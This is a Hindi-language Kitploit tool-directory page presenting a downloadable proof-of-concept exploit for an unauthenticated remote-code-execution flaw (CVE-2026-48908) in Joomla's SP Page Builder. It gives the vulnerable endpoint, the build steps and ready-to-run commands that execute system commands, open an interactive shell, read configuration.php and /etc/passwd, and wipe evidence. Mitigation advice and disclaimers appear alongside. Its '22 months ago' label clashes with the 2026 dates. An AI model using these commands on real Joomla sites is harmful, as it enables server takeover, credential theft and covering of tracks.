Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-48908-SP-Page-Builder-Joomla — CVE-2026-48908 - SP Page Builder Joomla अप्रमाणित RCE | Kitploit
उपकरण/GitHubGitHub/gagaltotal/cve-2026-48908-sp-page-builder-joomla
भेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगपेलोड डेवलपमेंट
GitHubgagaltotal/cve-2026-48908-sp-page-builder-joomla

CVE-2026-48908-SP-Page-Builder-Joomla

CVE-2026-48908 - SP Page Builder Joomla अप्रमाणित RCE

रिपॉजिटरी देखें
22 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-48908: SP Page Builder Joomla बिना प्रमाणीकरण के RCE

CVE-2026-48908 के लिए प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट, जो Joomla SP Page Builder घटक में बिना प्रमाणीकरण के रिमोट कोड निष्पादन (RCE) भेद्यता है।

भेद्यता अवलोकन

CVE-2026-48908 एक गंभीर सुरक्षा भेद्यता है जो बिना प्रमाणीकरण वाले हमलावरों को SP Page Builder घटक में ZIP फ़ाइल निष्कर्षण के अनुचित हैंडलिंग के माध्यम से कमजोर Joomla इंस्टॉलेशन पर मनमाना कोड निष्पादित करने की अनुमति देती है।

तकनीकी विवरण

  • CVE ID: CVE-2026-48908
  • घटक: com_sppagebuilder
  • कमजोर संस्करण: <= 6.6.1
  • निश्चित संस्करण: 6.6.2
  • हमला वेक्टर: नेटवर्क-आधारित, बिना प्रमाणीकरण
  • CVSS स्कोर: गंभीर
  • भेद्यता प्रकार: मनमानी फ़ाइल अपलोड / ZIP निष्कर्षण RCE
  • हमला एंडपॉइंट: index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon

मूल कारण

यह भेद्यता संपत्ति अपलोड कार्यक्षमता में मौजूद है जहां एप्लिकेशन आइकन संपत्तियों वाली ZIP फ़ाइलों का अनुचित रूप से सत्यापन और निष्कर्षण करता है। एक हमलावर PHP पेलोड के साथ एक दुर्भावनापूर्ण ZIP फ़ाइल तैयार कर सकता है जिसे वेब-सुलभ निर्देशिका में निकाला जाएगा, जिससे रिमोट कोड निष्पादन संभव होगा।

आवश्यकताएँ

  • Go 1.26.4 या बाद का संस्करण
  • लक्ष्य Joomla इंस्टॉलेशन तक नेटवर्क पहुंच
  • मान्य लक्ष्य URL

निर्भरताएँ

  • golang.org/x/term - सुरक्षित पासवर्ड इनपुट के लिए टर्मिनल उपयोगिताएँ

स्थापना

स्रोत से

root@kitploit:~
git clone https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
cd CVE-2026-48908-SP-Page-Builder-Joomla
go mod init CVE-2026-48908-SP-Page-Builder-Joomla
go mod download
or
go mod tidy
go build -o poc_tot poc_tot.go

पूर्व-निर्मित बाइनरी

संकलित बाइनरीज़ रिलीज़ अनुभाग में उपलब्ध हैं।

उपयोग

Screen Capture

बुनियादी कमांड निष्पादन

Screen Capture

root@kitploit:~
./poc_tot -target http://target-site.com -cmd "whoami"

इंटरैक्टिव शेल

root@kitploit:~
./poc_tot -target http://target-site.com -shell

भेद्यता आकलन

root@kitploit:~
./poc_tot -target http://target-site.com -check

सफाई

root@kitploit:~
./poc_tot -target http://target-site.com -cleanup

कस्टम टोकन का उपयोग (यदि उपलब्ध हो)

root@kitploit:~
./poc_tot -target http://target-site.com -cmd "id" -token "your_joomla_token"

कमांड-लाइन विकल्प

root@kitploit:~
-target string
    कमजोर Joomla इंस्टॉलेशन का लक्ष्य URL (आवश्यक)
    उदाहरण: http://target.com या https://target.com

-cmd string
    लक्ष्य पर निष्पादित करने का सिस्टम कमांड
    उदाहरण: "cat /etc/passwd"

-shell
    लक्ष्य पर इंटरैक्टिव शेल लॉन्च करें (सफल शोषण आवश्यक)

-check
    शोषण का प्रयास किए बिना जांचें कि लक्ष्य कमजोर है या नहीं

-cleanup
    लक्ष्य से अपलोड किए गए शेल और आर्टिफैक्ट हटाएं

-token string
    शोषण के लिए CSRF टोकन (वैकल्पिक, प्रदान न करने पर स्वतः पता लगाया जाता है)

शोषण विधियाँ

टूल कई शोषण वैक्टर का समर्थन करता है:

  1. प्रत्यक्ष PHP अपलोड - PHP फ़ाइलों को सीधे निष्पादन योग्य पथों पर अपलोड करता है
  2. निर्देशिका ट्रैवर्सल - प्रतिबंधों को दरकिनार करने के लिए पथ ट्रैवर्सल का उपयोग करता है
  3. आर्काइव हेरफेर - एम्बेडेड पेलोड के साथ दुर्भावनापूर्ण ZIP आर्काइव तैयार करता है
  4. एक्सटेंशन स्पूफिंग - डबल एक्सटेंशन और केस विविधताओं का उपयोग करता है

उदाहरण

टोही

root@kitploit:~
./poc_tot -target http://vulnerable.local -check

एकल कमांड निष्पादित करें

root@kitploit:~
./poc_tot -target http://vulnerable.local -cmd "ls -la /var/www/html"

संवेदनशील फ़ाइलें प्राप्त करें

root@kitploit:~
./poc_tot -target http://vulnerable.local -cmd "cat configuration.php"

इंटरैक्टिव एक्सेस

root@kitploit:~
./poc_tot -target http://vulnerable.local -shell
# शेल में:
> id
> whoami
> pwd

साक्ष्य साफ़ करें

root@kitploit:~
./poc_tot -target http://vulnerable.local -cleanup

सुरक्षा संबंधी विचार

प्रशासकों के लिए

यदि आप SP Page Builder घटक के साथ Joomla चला रहे हैं:

  1. तुरंत अपडेट करें: SP Page Builder 6.6.2 या बाद के संस्करण में अपग्रेड करें
  2. घटक अक्षम करें: यदि तत्काल अपडेट संभव नहीं है, तो com_sppagebuilder को अक्षम करें
  3. लॉग मॉनिटर करें: संदिग्ध गतिविधि के लिए वेब सर्वर लॉग जांचें
  4. अनुमतियां प्रतिबंधित करें: वेब निर्देशिकाओं पर उचित फ़ाइल अनुमतियां सुनिश्चित करें
  5. वेब एप्लिकेशन फ़ायरवॉल: शोषण प्रयासों को अवरुद्ध करने के लिए WAF नियम तैनात करें

सुरक्षा शोधकर्ताओं के लिए

  • केवल उन सिस्टम पर इस टूल का उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट प्राधिकरण है
  • पहले पृथक वातावरण में परीक्षण करें
  • सभी निष्कर्षों को उचित रूप से दस्तावेज़ित करें
  • जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें
  • अनधिकृत पहुंच के लिए उपयोग न करें

अस्वीकरण

यह सॉफ़्टवेयर केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। लेखक इस टूल के दुरुपयोग या इसके कारण होने वाली क्षति के लिए जिम्मेदारी स्वीकार नहीं करते हैं। उपयोगकर्ता किसी भी लक्ष्य सिस्टम पर इस टूल का उपयोग करने से पहले उचित प्राधिकरण सुनिश्चित करने के लिए जिम्मेदार हैं।

इस टूल का उपयोग करके, आप स्वीकार करते हैं कि:

  • आप इसका उपयोग केवल उन सिस्टम पर करेंगे जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास लिखित प्राधिकरण है
  • आप कानूनी निहितार्थों को समझते हैं और पूर्ण जिम्मेदारी स्वीकार करते हैं
  • लेखक किसी भी क्षति या कानूनी परिणामों के लिए उत्तरदायी नहीं हैं
  • आप सभी लागू कानूनों और विनियमों का अनुपालन करेंगे

कानूनी सूचना

यह टूल केवल रक्षात्मक सुरक्षा अनुसंधान और अधिकृत पैठ परीक्षण के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच कंप्यूटर फ्रॉड और एब्यूज एक्ट और अन्य न्यायक्षेत्रों में समान कानूनों का उल्लंघन करती है। सुरक्षा परीक्षण करने से पहले हमेशा लिखित रूप में उचित प्राधिकरण प्राप्त करें।

संदर्भ

  • Joomla आधिकारिक सुरक्षा केंद्र: https://docs.joomla.org/Security_Checklist
  • SP Page Builder: https://www.sp-components.com/
  • CVE-2026-48908 विवरण: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-48908

शमन

तत्काल कार्रवाइयाँ

  1. संस्करण 6.6.2 या बाद के संस्करण में सुरक्षा अद्यतन लागू करें
  2. यदि अद्यतन उपलब्ध नहीं है, तो घटक अक्षम करें: index.php?option=com_installer&view=manage
  3. शोषण प्रयासों के लिए त्रुटि लॉग जांचें
  4. मीडिया निर्देशिकाओं में संदिग्ध PHP फ़ाइलों के लिए फ़ाइल सिस्टम की समीक्षा करें

दीर्घकालिक सुरक्षा

  1. Joomla और सभी घटकों को अद्यतन रखें
  2. स्वचालित सुरक्षा स्कैनिंग लागू करें
  3. सुरक्षा हेडर और WAF नियमों का उपयोग करें
  4. फ़ाइल अखंडता की निगरानी करें
  5. नियमित बैकअप बनाए रखें
  6. न्यूनतम विशेषाधिकार के सिद्धांत को लागू करें

योगदान

सुरक्षा अनुसंधान योगदान का स्वागत है। कृपया:

  1. भेद्यताओं की जिम्मेदारी से रिपोर्ट करें
  2. मौजूदा कोड शैली का पालन करें
  3. विस्तृत दस्तावेज़ीकरण शामिल करें
  4. सबमिशन से पहले अच्छी तरह से परीक्षण करें

लेखक

GhostGTR666 (Gagaltotal666)

  • GitHub: https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
  • ईमेल: GitHub के माध्यम से संपर्क करें

परिवर्तन लॉग

संस्करण 1.0.0

  • प्रारंभिक रिलीज़
  • कई शोषण वैक्टर के लिए समर्थन
  • इंटरैक्टिव शेल कार्यक्षमता
  • भेद्यता जांच और सफाई संचालन

सहायता

समस्याओं, प्रश्नों या योगदान के लिए:

  1. मौजूदा GitHub मुद्दों की जांच करें
  2. त्रुटि संदेशों और लॉग की समीक्षा करें
  3. सुनिश्चित करें कि लक्ष्य URL सही और सुलभ है
  4. परीक्षण से पहले उचित प्राधिकरण सत्यापित करें

लाइसेंस

यह प्रोजेक्ट सुरक्षा अनुसंधान उद्देश्यों के लिए यथावत प्रदान किया गया है। उपयोग से पहले सुरक्षा उपकरणों और पैठ परीक्षण के संबंध में स्थानीय कानूनों की समीक्षा करें।


अंतिम अद्यतन: 2026-06-24

अस्वीकरण: यह टूल केवल अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।

टूल डाउनलोड करें